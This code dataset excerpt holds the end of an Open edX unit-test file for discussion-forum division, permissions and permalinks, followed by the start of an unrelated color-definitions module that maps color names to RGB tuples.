config_course_discussions(course, always_divide_inline_discussions=True)
team = CourseTeamFactory(course_id=course.id)
# Verify that team discussions are not cohorted, but other discussions are
# if "always cohort inline discussions" is set to true.
assert not utils.is_commentable_divided(course.id, team.discussion_topic_id)
assert utils.is_commentable_divided(course.id, 'random')
def test_is_commentable_divided_cohorts(self):
course = modulestore().get_course(self.toy_course_key)
set_discussion_division_settings(
course.id,
enable_cohorts=True,
divided_discussions=[],
always_divide_inline_discussions=True,
division_scheme=CourseDiscussionSettings.NONE,
)
# Although Cohorts are enabled, discussion division is explicitly disabled.
assert not utils.is_commentable_divided(course.id, 'random')
# Now set the discussion division scheme.
set_discussion_division_settings(
course.id,
enable_cohorts=True,
divided_discussions=[],
always_divide_inline_discussions=True,
division_scheme=CourseDiscussionSettings.COHORT,
)
assert utils.is_commentable_divided(course.id, 'random')
def test_is_commentable_divided_enrollment_track(self):
course = modulestore().get_course(self.toy_course_key)
set_discussion_division_settings(
course.id,
divided_discussions=[],
always_divide_inline_discussions=True,
division_scheme=CourseDiscussionSettings.ENROLLMENT_TRACK,
)
# Although division scheme is set to ENROLLMENT_TRACK, divided returns
# False because there is only a single enrollment mode.
assert not utils.is_commentable_divided(course.id, 'random')
# Now create 2 explicit course modes.
CourseModeFactory.create(course_id=course.id, mode_slug=CourseMode.AUDIT)
CourseModeFactory.create(course_id=course.id, mode_slug=CourseMode.VERIFIED)
assert utils.is_commentable_divided(course.id, 'random')
class GroupIdForUserTestCase(ModuleStoreTestCase):
""" Test the get_group_id_for_user method. """
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.AUDIT)
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.VERIFIED)
self.test_user = UserFactory.create()
CourseEnrollmentFactory.create(
mode=CourseMode.VERIFIED, user=self.test_user, course_id=self.course.id
)
self.test_cohort = CohortFactory(
course_id=self.course.id,
name='Test Cohort',
users=[self.test_user]
)
def test_discussion_division_disabled(self):
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert CourseDiscussionSettings.NONE == course_discussion_settings.division_scheme
assert utils.get_group_id_for_user(self.test_user, course_discussion_settings) is None
def test_discussion_division_by_cohort(self):
set_discussion_division_settings(
self.course.id, enable_cohorts=True, division_scheme=CourseDiscussionSettings.COHORT
)
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert CourseDiscussionSettings.COHORT == course_discussion_settings.division_scheme
assert self.test_cohort.id == utils.get_group_id_for_user(self.test_user, course_discussion_settings)
def test_discussion_division_by_enrollment_track(self):
set_discussion_division_settings(
self.course.id, division_scheme=CourseDiscussionSettings.ENROLLMENT_TRACK
)
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert CourseDiscussionSettings.ENROLLMENT_TRACK == course_discussion_settings.division_scheme
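        # In these tests the enrollment-track groups use the synthetic ids
        # -1 (audit) and -2 (verified), so the verified learner maps to -2.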
        assert -2 == utils.get_group_id_for_user(self.test_user, course_discussion_settings)
class CourseDiscussionDivisionEnabledTestCase(ModuleStoreTestCase):
""" Test the course_discussion_division_enabled and available_division_schemes methods. """
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.AUDIT)
self.test_cohort = CohortFactory(
course_id=self.course.id,
name='Test Cohort',
users=[]
)
def test_discussion_division_disabled(self):
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert not utils.course_discussion_division_enabled(course_discussion_settings)
assert [] == utils.available_division_schemes(self.course.id)
def test_discussion_division_by_cohort(self):
set_discussion_division_settings(
self.course.id, enable_cohorts=False, division_scheme=CourseDiscussionSettings.COHORT
)
# Because cohorts are disabled, discussion division is not enabled.
assert not utils.course_discussion_division_enabled(get_course_discussion_settings(self.course.id))
assert [] == utils.available_division_schemes(self.course.id)
# Now enable cohorts, which will cause discussions to be divided.
set_discussion_division_settings(
self.course.id, enable_cohorts=True, division_scheme=CourseDiscussionSettings.COHORT
)
assert utils.course_discussion_division_enabled(get_course_discussion_settings(self.course.id))
assert [CourseDiscussionSettings.COHORT] == utils.available_division_schemes(self.course.id)
def test_discussion_division_by_enrollment_track(self):
set_discussion_division_settings(
self.course.id, division_scheme=CourseDiscussionSettings.ENROLLMENT_TRACK
)
# Only a single enrollment track exists, so discussion division is not enabled.
assert not utils.course_discussion_division_enabled(get_course_discussion_settings(self.course.id))
assert [] == utils.available_division_schemes(self.course.id)
# Now create a second CourseMode, which will cause discussions to be divided.
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.VERIFIED)
assert utils.course_discussion_division_enabled(get_course_discussion_settings(self.course.id))
assert [CourseDiscussionSettings.ENROLLMENT_TRACK] == utils.available_division_schemes(self.course.id)
class GroupNameTestCase(ModuleStoreTestCase):
""" Test the get_group_name and get_group_names_by_id methods. """
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.AUDIT)
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.VERIFIED)
self.test_cohort_1 = CohortFactory(
course_id=self.course.id,
name='Cohort 1',
users=[]
)
self.test_cohort_2 = CohortFactory(
course_id=self.course.id,
name='Cohort 2',
users=[]
)
def test_discussion_division_disabled(self):
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert {} == utils.get_group_names_by_id(course_discussion_settings)
        assert utils.get_group_name(-1000, course_discussion_settings) is None
def test_discussion_division_by_cohort(self):
set_discussion_division_settings(
self.course.id, enable_cohorts=True, division_scheme=CourseDiscussionSettings.COHORT
)
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert {self.test_cohort_1.id: self.test_cohort_1.name, self.test_cohort_2.id: self.test_cohort_2.name} == utils.get_group_names_by_id(course_discussion_settings)
assert self.test_cohort_2.name == utils.get_group_name(self.test_cohort_2.id, course_discussion_settings)
# Test also with a group_id that doesn't exist.
        assert utils.get_group_name(-1000, course_discussion_settings) is None
def test_discussion_division_by_enrollment_track(self):
set_discussion_division_settings(
self.course.id, division_scheme=CourseDiscussionSettings.ENROLLMENT_TRACK
)
course_discussion_settings = get_course_discussion_settings(self.course.id)
        assert {-1: 'audit course', -2: 'verified course'} == utils.get_group_names_by_id(course_discussion_settings)
        assert 'verified course' == utils.get_group_name(-2, course_discussion_settings)
        # Test also with a group_id that doesn't exist.
        assert utils.get_group_name(-1000, course_discussion_settings) is None
class PermissionsTestCase(ModuleStoreTestCase):
"""Test utils functionality related to forums "abilities" (permissions)"""
def test_get_ability(self):
content = {}
content['user_id'] = '1'
content['type'] = 'thread'
user = mock.Mock()
user.id = 1
with mock.patch(
'lms.djangoapps.discussion.django_comment_client.utils.check_permissions_by_view'
) as check_perm:
check_perm.return_value = True
assert utils.get_ability(None, content, user) == {'editable': True, 'can_reply': True, 'can_delete': True, 'can_openclose': True, 'can_vote': False, 'can_report': False}
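            # For the author's own content (user_id matches the requesting user),
            # voting and reporting are disabled; for another user's content they
            # are allowed.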
content['user_id'] = '2'
assert utils.get_ability(None, content, user) == {'editable': True, 'can_reply': True, 'can_delete': True, 'can_openclose': True, 'can_vote': True, 'can_report': True}
def test_get_ability_with_global_staff(self):
"""
        Tests that global staff have the right to report another user's post,
        regardless of whether they are enrolled in the course.
"""
content = {'user_id': '1', 'type': 'thread'}
with mock.patch(
'lms.djangoapps.discussion.django_comment_client.utils.check_permissions_by_view'
) as check_perm:
# check_permissions_by_view returns false because user is not enrolled in the course.
check_perm.return_value = False
global_staff = UserFactory(username='global_staff', email='global_staff@edx.org', is_staff=True)
assert utils.get_ability(None, content, global_staff) == {'editable': False, 'can_reply': False, 'can_delete': False, 'can_openclose': False, 'can_vote': False, 'can_report': True}
def test_is_content_authored_by(self):
content = {}
user = mock.Mock()
user.id = 1
# strict equality checking
content['user_id'] = 1
assert utils.is_content_authored_by(content, user)
# cast from string to int
content['user_id'] = '1'
assert utils.is_content_authored_by(content, user)
# strict equality checking, fails
content['user_id'] = 2
assert not utils.is_content_authored_by(content, user)
# cast from string to int, fails
content['user_id'] = 'string'
assert not utils.is_content_authored_by(content, user)
# content has no known author
del content['user_id']
assert not utils.is_content_authored_by(content, user)
class GroupModeratorPermissionsTestCase(ModuleStoreTestCase):
"""Test utils functionality related to forums "abilities" (permissions) for group moderators"""
def _check_condition(user, condition, content):
"""
Mocks check_condition method because is_open and is_team_member_if_applicable must always be true
in order to interact with a thread or comment.
"""
        return condition in ('is_open', 'is_team_member_if_applicable')
def setUp(self):
super().setUp()
# Create course, seed permissions roles, and create team
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
verified_coursemode = CourseMode.VERIFIED
audit_coursemode = CourseMode.AUDIT
# Create four users: group_moderator (who is within the verified enrollment track and in the cohort),
# verified_user (who is in the verified enrollment track but not the cohort),
# cohorted_user (who is in the cohort but not the verified enrollment track),
# and plain_user (who is neither in the cohort nor the verified enrollment track)
self.group_moderator = UserFactory(username='group_moderator', email='group_moderator@edx.org')
CourseEnrollmentFactory(
course_id=self.course.id,
user=self.group_moderator,
mode=verified_coursemode
)
self.verified_user = UserFactory(username='verified', email='verified@edx.org')
CourseEnrollmentFactory(
course_id=self.course.id,
user=self.verified_user,
mode=verified_coursemode
)
self.cohorted_user = UserFactory(username='cohort', email='cohort@edx.org')
CourseEnrollmentFactory(
course_id=self.course.id,
user=self.cohorted_user,
mode=audit_coursemode
)
self.plain_user = UserFactory(username='plain', email='plain@edx.org')
CourseEnrollmentFactory(
course_id=self.course.id,
user=self.plain_user,
mode=audit_coursemode
)
CohortFactory(
course_id=self.course.id,
name='Test Cohort',
users=[self.group_moderator, self.cohorted_user]
)
# Give group moderator permissions to group_moderator
assign_role(self.course.id, self.group_moderator, 'Group Moderator')
@mock.patch(
'lms.djangoapps.discussion.django_comment_client.permissions._check_condition',
side_effect=_check_condition,
)
def test_not_divided(self, check_condition_function):
"""
Group moderator should not have moderator permissions if the discussions are not divided.
"""
content = {'user_id': self.plain_user.id, 'type': 'thread', 'username': self.plain_user.username}
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': False, 'can_reply': True, 'can_delete': False, 'can_openclose': False, 'can_vote': True, 'can_report': True}
content = {'user_id': self.cohorted_user.id, 'type': 'thread'}
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': False, 'can_reply': True, 'can_delete': False, 'can_openclose': False, 'can_vote': True, 'can_report': True}
content = {'user_id': self.verified_user.id, 'type': 'thread'}
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': False, 'can_reply': True, 'can_delete': False, 'can_openclose': False, 'can_vote': True, 'can_report': True}
@mock.patch(
'lms.djangoapps.discussion.django_comment_client.permissions._check_condition',
side_effect=_check_condition,
)
def test_divided_within_group(self, check_condition_function):
"""
Group moderator should have moderator permissions within their group if the discussions are divided.
"""
set_discussion_division_settings(self.course.id, enable_cohorts=True,
division_scheme=CourseDiscussionSettings.COHORT)
content = {'user_id': self.cohorted_user.id, 'type': 'thread', 'username': self.cohorted_user.username}
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': True, 'can_reply': True, 'can_delete': True, 'can_openclose': True, 'can_vote': True, 'can_report': True}
@mock.patch(
'lms.djangoapps.discussion.django_comment_client.permissions._check_condition',
side_effect=_check_condition,
)
def test_divided_outside_group(self, check_condition_function):
"""
Group moderator should not have moderator permissions outside of their group.
"""
content = {'user_id': self.plain_user.id, 'type': 'thread', 'username': self.plain_user.username}
set_discussion_division_settings(self.course.id, division_scheme=CourseDiscussionSettings.NONE)
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': False, 'can_reply': True, 'can_delete': False, 'can_openclose': False, 'can_vote': True, 'can_report': True}
class ClientConfigurationTestCase(TestCase):
"""Simple test cases to ensure enabling/disabling the use of the comment service works as intended."""
def test_disabled(self):
"""Ensures that an exception is raised when forums are disabled."""
config = ForumsConfig.current()
config.enabled = False
config.save()
with pytest.raises(CommentClientMaintenanceError):
perform_request('GET', 'http://www.google.com')
@patch('requests.request')
def test_enabled(self, mock_request):
"""Ensures that requests proceed normally when forums are enabled."""
config = ForumsConfig.current()
config.enabled = True
config.save()
response = Mock()
response.status_code = 200
response.json = lambda: {}
mock_request.return_value = response
result = perform_request('GET', 'http://www.google.com')
assert result == {}
def set_discussion_division_settings(
course_key, enable_cohorts=False, always_divide_inline_discussions=False,
divided_discussions=[], division_scheme=CourseDiscussionSettings.COHORT
):
"""
Convenience method for setting cohort enablement and discussion settings.
COHORT is the default division_scheme, as no other schemes were supported at
the time that the unit tests were originally written.
"""
set_course_discussion_settings(
course_key=course_key,
divided_discussions=divided_discussions,
division_scheme=division_scheme,
always_divide_inline_discussions=always_divide_inline_discussions,
)
set_course_cohorted(course_key, enable_cohorts)
@ddt.ddt
class MiscUtilsTests(TestCase):
@ddt.data(
('course-v1:edX+foo101+bar_t2', '99', '99'),
('course-v1:edX+foo101+bar_t2', 99, 99)
)
@ddt.unpack
def test_permalink_does_not_break_for_thread(self, course_id, discussion_id, content_id):
"""
        Tests that the permalink method does not break for thread-type content data.
"""
url_kwargs = {'course_id': course_id, 'discussion_id': discussion_id, 'thread_id': content_id}
thread_data = {'id': content_id, 'course_id': course_id, 'commentable_id': discussion_id, 'type': 'thread'}
expected_url = reverse('single_thread', kwargs=url_kwargs)
assert utils.permalink(thread_data) == expected_url
thread_data['course_id'] = CourseKey.from_string(course_id)
assert utils.permalink(thread_data) == expected_url
@ddt.data(
('course-v1:edX+foo101+bar_t2', '99', '99'),
('course-v1:edX+foo101+bar_t2', 99, 99)
)
@ddt.unpack
def test_permalink_does_not_break_for_non_thread(self, course_id, discussion_id, thread_id):
"""
        Tests that the permalink method does not break for non-thread-type content data.
"""
url_kwargs = {'course_id': course_id, 'discussion_id': discussion_id, 'thread_id': thread_id}
thread_data = {
'id': '101', 'thread_id': thread_id, 'course_id': course_id, 'commentable_id': discussion_id, 'type': 'foo'
}
expected_url = reverse('single_thread', kwargs=url_kwargs) + '#' + thread_data['id']
assert utils.permalink(thread_data) == expected_url
thread_data['course_id'] = CourseKey.from_string(course_id)
assert utils.permalink(thread_data) == expected_url
| stvstnfrd/edx-platform | lms/djangoapps/discussion/django_comment_client/tests/test_utils.py | Python | agpl-3.0 | 78,549 | 0.002928 |
#
# colors.py -- color definitions
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import re
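
# A minimal illustrative sketch (the helper name below is only an example, not
# an established API of this module): the tuples in ``color_dict`` are floats
# normalized to the 0.0-1.0 range, so scaling by 255 recovers conventional
# 8-bit RGB values.
def _example_to_rgb8(name):
    """Return (r, g, b) as 0-255 ints for a named color in ``color_dict``.

    >>> _example_to_rgb8('cadetblue')
    (95, 158, 160)
    """
    r, g, b = color_dict[name]
    return (int(round(r * 255)), int(round(g * 255)), int(round(b * 255)))
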
color_dict = {
'aliceblue': (0.9411764705882353, 0.9725490196078431, 1.0),
'antiquewhite': (0.9803921568627451, 0.9215686274509803, 0.8431372549019608),
'antiquewhite1': (1.0, 0.9372549019607843, 0.8588235294117647),
'antiquewhite2': (0.9333333333333333, 0.8745098039215686, 0.8),
'antiquewhite3': (0.803921568627451, 0.7529411764705882, 0.6901960784313725),
'antiquewhite4': (0.5450980392156862,
0.5137254901960784,
0.47058823529411764),
'aquamarine': (0.4980392156862745, 1.0, 0.8313725490196079),
'aquamarine1': (0.4980392156862745, 1.0, 0.8313725490196079),
'aquamarine2': (0.4627450980392157, 0.9333333333333333, 0.7764705882352941),
'aquamarine3': (0.4, 0.803921568627451, 0.6666666666666666),
'aquamarine4': (0.27058823529411763, 0.5450980392156862, 0.4549019607843137),
'azure': (0.9411764705882353, 1.0, 1.0),
'azure1': (0.9411764705882353, 1.0, 1.0),
'azure2': (0.8784313725490196, 0.9333333333333333, 0.9333333333333333),
'azure3': (0.7568627450980392, 0.803921568627451, 0.803921568627451),
'azure4': (0.5137254901960784, 0.5450980392156862, 0.5450980392156862),
'beige': (0.9607843137254902, 0.9607843137254902, 0.8627450980392157),
'bisque': (1.0, 0.8941176470588236, 0.7686274509803922),
'bisque1': (1.0, 0.8941176470588236, 0.7686274509803922),
'bisque2': (0.9333333333333333, 0.8352941176470589, 0.7176470588235294),
'bisque3': (0.803921568627451, 0.7176470588235294, 0.6196078431372549),
'bisque4': (0.5450980392156862, 0.49019607843137253, 0.4196078431372549),
'black': (0.0, 0.0, 0.0),
'blanchedalmond': (1.0, 0.9215686274509803, 0.803921568627451),
'blue': (0.0, 0.0, 1.0),
'blue1': (0.0, 0.0, 1.0),
'blue2': (0.0, 0.0, 0.9333333333333333),
'blue3': (0.0, 0.0, 0.803921568627451),
'blue4': (0.0, 0.0, 0.5450980392156862),
'blueviolet': (0.5411764705882353, 0.16862745098039217, 0.8862745098039215),
'brown': (0.6470588235294118, 0.16470588235294117, 0.16470588235294117),
'brown1': (1.0, 0.25098039215686274, 0.25098039215686274),
'brown2': (0.9333333333333333, 0.23137254901960785, 0.23137254901960785),
'brown3': (0.803921568627451, 0.2, 0.2),
'brown4': (0.5450980392156862, 0.13725490196078433, 0.13725490196078433),
'burlywood': (0.8705882352941177, 0.7215686274509804, 0.5294117647058824),
'burlywood1': (1.0, 0.8274509803921568, 0.6078431372549019),
'burlywood2': (0.9333333333333333, 0.7725490196078432, 0.5686274509803921),
'burlywood3': (0.803921568627451, 0.6666666666666666, 0.49019607843137253),
'burlywood4': (0.5450980392156862, 0.45098039215686275, 0.3333333333333333),
'cadetblue': (0.37254901960784315, 0.6196078431372549, 0.6274509803921569),
'cadetblue1': (0.596078431372549, 0.9607843137254902, 1.0),
'cadetblue2': (0.5568627450980392, 0.8980392156862745, 0.9333333333333333),
'cadetblue3': (0.47843137254901963, 0.7725490196078432, 0.803921568627451),
'cadetblue4': (0.3254901960784314, 0.5254901960784314, 0.5450980392156862),
'chartreuse': (0.4980392156862745, 1.0, 0.0),
'chartreuse1': (0.4980392156862745, 1.0, 0.0),
'chartreuse2': (0.4627450980392157, 0.9333333333333333, 0.0),
'chartreuse3': (0.4, 0.803921568627451, 0.0),
'chartreuse4': (0.27058823529411763, 0.5450980392156862, 0.0),
'chocolate': (0.8235294117647058, 0.4117647058823529, 0.11764705882352941),
'chocolate1': (1.0, 0.4980392156862745, 0.1411764705882353),
'chocolate2': (0.9333333333333333, 0.4627450980392157, 0.12941176470588237),
'chocolate3': (0.803921568627451, 0.4, 0.11372549019607843),
'chocolate4': (0.5450980392156862, 0.27058823529411763, 0.07450980392156863),
'coral': (1.0, 0.4980392156862745, 0.3137254901960784),
'coral1': (1.0, 0.4470588235294118, 0.33725490196078434),
'coral2': (0.9333333333333333, 0.41568627450980394, 0.3137254901960784),
'coral3': (0.803921568627451, 0.3568627450980392, 0.27058823529411763),
'coral4': (0.5450980392156862, 0.24313725490196078, 0.1843137254901961),
'cornflowerblue': (0.39215686274509803,
0.5843137254901961,
0.9294117647058824),
'cornsilk': (1.0, 0.9725490196078431, 0.8627450980392157),
'cornsilk1': (1.0, 0.9725490196078431, 0.8627450980392157),
'cornsilk2': (0.9333333333333333, 0.9098039215686274, 0.803921568627451),
'cornsilk3': (0.803921568627451, 0.7843137254901961, 0.6941176470588235),
'cornsilk4': (0.5450980392156862, 0.5333333333333333, 0.47058823529411764),
'cyan': (0.0, 1.0, 1.0),
'cyan1': (0.0, 1.0, 1.0),
'cyan2': (0.0, 0.9333333333333333, 0.9333333333333333),
'cyan3': (0.0, 0.803921568627451, 0.803921568627451),
'cyan4': (0.0, 0.5450980392156862, 0.5450980392156862),
'darkblue': (0.0, 0.0, 0.5450980392156862),
'darkcyan': (0.0, 0.5450980392156862, 0.5450980392156862),
'darkgoldenrod': (0.7215686274509804,
0.5254901960784314,
0.043137254901960784),
'darkgoldenrod1': (1.0, 0.7254901960784313, 0.058823529411764705),
'darkgoldenrod2': (0.9333333333333333,
0.6784313725490196,
0.054901960784313725),
'darkgoldenrod3': (0.803921568627451,
0.5843137254901961,
0.047058823529411764),
'darkgoldenrod4': (0.5450980392156862,
0.396078431372549,
0.03137254901960784),
'darkgray': (0.6627450980392157, 0.6627450980392157, 0.6627450980392157),
'darkgreen': (0.0, 0.39215686274509803, 0.0),
'darkgrey': (0.6627450980392157, 0.6627450980392157, 0.6627450980392157),
'darkkhaki': (0.7411764705882353, 0.7176470588235294, 0.4196078431372549),
'darkmagenta': (0.5450980392156862, 0.0, 0.5450980392156862),
'darkolivegreen': (0.3333333333333333,
0.4196078431372549,
0.1843137254901961),
'darkolivegreen1': (0.792156862745098, 1.0, 0.4392156862745098),
'darkolivegreen2': (0.7372549019607844,
0.9333333333333333,
0.40784313725490196),
'darkolivegreen3': (0.6352941176470588,
0.803921568627451,
0.35294117647058826),
'darkolivegreen4': (0.43137254901960786,
0.5450980392156862,
0.23921568627450981),
'darkorange': (1.0, 0.5490196078431373, 0.0),
'darkorange1': (1.0, 0.4980392156862745, 0.0),
'darkorange2': (0.9333333333333333, 0.4627450980392157, 0.0),
'darkorange3': (0.803921568627451, 0.4, 0.0),
'darkorange4': (0.5450980392156862, 0.27058823529411763, 0.0),
'darkorchid': (0.6, 0.19607843137254902, 0.8),
'darkorchid1': (0.7490196078431373, 0.24313725490196078, 1.0),
'darkorchid2': (0.6980392156862745, 0.22745098039215686, 0.9333333333333333),
'darkorchid3': (0.6039215686274509, 0.19607843137254902, 0.803921568627451),
'darkorchid4': (0.40784313725490196, 0.13333333333333333, 0.5450980392156862),
'darkred': (0.5450980392156862, 0.0, 0.0),
'darksalmon': (0.9137254901960784, 0.5882352941176471, 0.47843137254901963),
'darkseagreen': (0.5607843137254902, 0.7372549019607844, 0.5607843137254902),
'darkseagreen1': (0.7568627450980392, 1.0, 0.7568627450980392),
'darkseagreen2': (0.7058823529411765, 0.9333333333333333, 0.7058823529411765),
'darkseagreen3': (0.6078431372549019, 0.803921568627451, 0.6078431372549019),
'darkseagreen4': (0.4117647058823529, 0.5450980392156862, 0.4117647058823529),
'darkslateblue': (0.2823529411764706,
0.23921568627450981,
0.5450980392156862),
'darkslategray': (0.1843137254901961,
0.30980392156862746,
0.30980392156862746),
'darkslategray1': (0.592156862745098, 1.0, 1.0),
'darkslategray2': (0.5529411764705883,
0.9333333333333333,
0.9333333333333333),
'darkslategray3': (0.4745098039215686, 0.803921568627451, 0.803921568627451),
'darkslategray4': (0.3215686274509804,
0.5450980392156862,
0.5450980392156862),
'darkslategrey': (0.1843137254901961,
0.30980392156862746,
0.30980392156862746),
'darkturquoise': (0.0, 0.807843137254902, 0.8196078431372549),
'darkviolet': (0.5803921568627451, 0.0, 0.8274509803921568),
'debianred': (0.8431372549019608, 0.027450980392156862, 0.3176470588235294),
'deeppink': (1.0, 0.0784313725490196, 0.5764705882352941),
'deeppink1': (1.0, 0.0784313725490196, 0.5764705882352941),
'deeppink2': (0.9333333333333333, 0.07058823529411765, 0.5372549019607843),
'deeppink3': (0.803921568627451, 0.06274509803921569, 0.4627450980392157),
'deeppink4': (0.5450980392156862, 0.0392156862745098, 0.3137254901960784),
'deepskyblue': (0.0, 0.7490196078431373, 1.0),
'deepskyblue1': (0.0, 0.7490196078431373, 1.0),
'deepskyblue2': (0.0, 0.6980392156862745, 0.9333333333333333),
'deepskyblue3': (0.0, 0.6039215686274509, 0.803921568627451),
'deepskyblue4': (0.0, 0.40784313725490196, 0.5450980392156862),
'dimgray': (0.4117647058823529, 0.4117647058823529, 0.4117647058823529),
'dimgrey': (0.4117647058823529, 0.4117647058823529, 0.4117647058823529),
'dodgerblue': (0.11764705882352941, 0.5647058823529412, 1.0),
'dodgerblue1': (0.11764705882352941, 0.5647058823529412, 1.0),
'dodgerblue2': (0.10980392156862745, 0.5254901960784314, 0.9333333333333333),
'dodgerblue3': (0.09411764705882353, 0.4549019607843137, 0.803921568627451),
'dodgerblue4': (0.06274509803921569, 0.3058823529411765, 0.5450980392156862),
'firebrick': (0.6980392156862745, 0.13333333333333333, 0.13333333333333333),
'firebrick1': (1.0, 0.18823529411764706, 0.18823529411764706),
'firebrick2': (0.9333333333333333, 0.17254901960784313, 0.17254901960784313),
'firebrick3': (0.803921568627451, 0.14901960784313725, 0.14901960784313725),
'firebrick4': (0.5450980392156862, 0.10196078431372549, 0.10196078431372549),
'floralwhite': (1.0, 0.9803921568627451, 0.9411764705882353),
'forestgreen': (0.13333333333333333, 0.5450980392156862, 0.13333333333333333),
'gainsboro': (0.8627450980392157, 0.8627450980392157, 0.8627450980392157),
'ghostwhite': (0.9725490196078431, 0.9725490196078431, 1.0),
'gold': (1.0, 0.8431372549019608, 0.0),
'gold1': (1.0, 0.8431372549019608, 0.0),
'gold2': (0.9333333333333333, 0.788235294117647, 0.0),
'gold3': (0.803921568627451, 0.6784313725490196, 0.0),
'gold4': (0.5450980392156862, 0.4588235294117647, 0.0),
'goldenrod': (0.8549019607843137, 0.6470588235294118, 0.12549019607843137),
'goldenrod1': (1.0, 0.7568627450980392, 0.1450980392156863),
'goldenrod2': (0.9333333333333333, 0.7058823529411765, 0.13333333333333333),
'goldenrod3': (0.803921568627451, 0.6078431372549019, 0.11372549019607843),
'goldenrod4': (0.5450980392156862, 0.4117647058823529, 0.0784313725490196),
'gray': (0.7450980392156863, 0.7450980392156863, 0.7450980392156863),
'gray0': (0.0, 0.0, 0.0),
'gray1': (0.011764705882352941, 0.011764705882352941, 0.011764705882352941),
'gray10': (0.10196078431372549, 0.10196078431372549, 0.10196078431372549),
'gray100': (1.0, 1.0, 1.0),
'gray11': (0.10980392156862745, 0.10980392156862745, 0.10980392156862745),
'gray12': (0.12156862745098039, 0.12156862745098039, 0.12156862745098039),
'gray13': (0.12941176470588237, 0.12941176470588237, 0.12941176470588237),
'gray14': (0.1411764705882353, 0.1411764705882353, 0.1411764705882353),
'gray15': (0.14901960784313725, 0.14901960784313725, 0.14901960784313725),
'gray16': (0.1607843137254902, 0.1607843137254902, 0.1607843137254902),
'gray17': (0.16862745098039217, 0.16862745098039217, 0.16862745098039217),
'gray18': (0.1803921568627451, 0.1803921568627451, 0.1803921568627451),
'gray19': (0.18823529411764706, 0.18823529411764706, 0.18823529411764706),
'gray2': (0.0196078431372549, 0.0196078431372549, 0.0196078431372549),
'gray20': (0.2, 0.2, 0.2),
'gray21': (0.21176470588235294, 0.21176470588235294, 0.21176470588235294),
'gray22': (0.2196078431372549, 0.2196078431372549, 0.2196078431372549),
'gray23': (0.23137254901960785, 0.23137254901960785, 0.23137254901960785),
'gray24': (0.23921568627450981, 0.23921568627450981, 0.23921568627450981),
'gray25': (0.25098039215686274, 0.25098039215686274, 0.25098039215686274),
'gray26': (0.25882352941176473, 0.25882352941176473, 0.25882352941176473),
'gray27': (0.27058823529411763, 0.27058823529411763, 0.27058823529411763),
'gray28': (0.2784313725490196, 0.2784313725490196, 0.2784313725490196),
'gray29': (0.2901960784313726, 0.2901960784313726, 0.2901960784313726),
'gray3': (0.03137254901960784, 0.03137254901960784, 0.03137254901960784),
'gray30': (0.30196078431372547, 0.30196078431372547, 0.30196078431372547),
'gray31': (0.30980392156862746, 0.30980392156862746, 0.30980392156862746),
'gray32': (0.3215686274509804, 0.3215686274509804, 0.3215686274509804),
'gray33': (0.32941176470588235, 0.32941176470588235, 0.32941176470588235),
'gray34': (0.3411764705882353, 0.3411764705882353, 0.3411764705882353),
'gray35': (0.34901960784313724, 0.34901960784313724, 0.34901960784313724),
'gray36': (0.3607843137254902, 0.3607843137254902, 0.3607843137254902),
'gray37': (0.3686274509803922, 0.3686274509803922, 0.3686274509803922),
'gray38': (0.3803921568627451, 0.3803921568627451, 0.3803921568627451),
'gray39': (0.38823529411764707, 0.38823529411764707, 0.38823529411764707),
'gray4': (0.0392156862745098, 0.0392156862745098, 0.0392156862745098),
'gray40': (0.4, 0.4, 0.4),
'gray41': (0.4117647058823529, 0.4117647058823529, 0.4117647058823529),
'gray42': (0.4196078431372549, 0.4196078431372549, 0.4196078431372549),
'gray43': (0.43137254901960786, 0.43137254901960786, 0.43137254901960786),
'gray44': (0.4392156862745098, 0.4392156862745098, 0.4392156862745098),
'gray45': (0.45098039215686275, 0.45098039215686275, 0.45098039215686275),
'gray46': (0.4588235294117647, 0.4588235294117647, 0.4588235294117647),
'gray47': (0.47058823529411764, 0.47058823529411764, 0.47058823529411764),
'gray48': (0.47843137254901963, 0.47843137254901963, 0.47843137254901963),
'gray49': (0.49019607843137253, 0.49019607843137253, 0.49019607843137253),
'gray5': (0.050980392156862744, 0.050980392156862744, 0.050980392156862744),
'gray50': (0.4980392156862745, 0.4980392156862745, 0.4980392156862745),
'gray51': (0.5098039215686274, 0.5098039215686274, 0.5098039215686274),
'gray52': (0.5215686274509804, 0.5215686274509804, 0.5215686274509804),
'gray53': (0.5294117647058824, 0.5294117647058824, 0.5294117647058824),
'gray54': (0.5411764705882353, 0.5411764705882353, 0.5411764705882353),
'gray55': (0.5490196078431373, 0.5490196078431373, 0.5490196078431373),
'gray56': (0.5607843137254902, 0.5607843137254902, 0.5607843137254902),
'gray57': (0.5686274509803921, 0.5686274509803921, 0.5686274509803921),
'gray58': (0.5803921568627451, 0.5803921568627451, 0.5803921568627451),
'gray59': (0.5882352941176471, 0.5882352941176471, 0.5882352941176471),
'gray6': (0.058823529411764705, 0.058823529411764705, 0.058823529411764705),
'gray60': (0.6, 0.6, 0.6),
'gray61': (0.611764705882353, 0.611764705882353, 0.611764705882353),
'gray62': (0.6196078431372549, 0.6196078431372549, 0.6196078431372549),
'gray63': (0.6313725490196078, 0.6313725490196078, 0.6313725490196078),
'gray64': (0.6392156862745098, 0.6392156862745098, 0.6392156862745098),
'gray65': (0.6509803921568628, 0.6509803921568628, 0.6509803921568628),
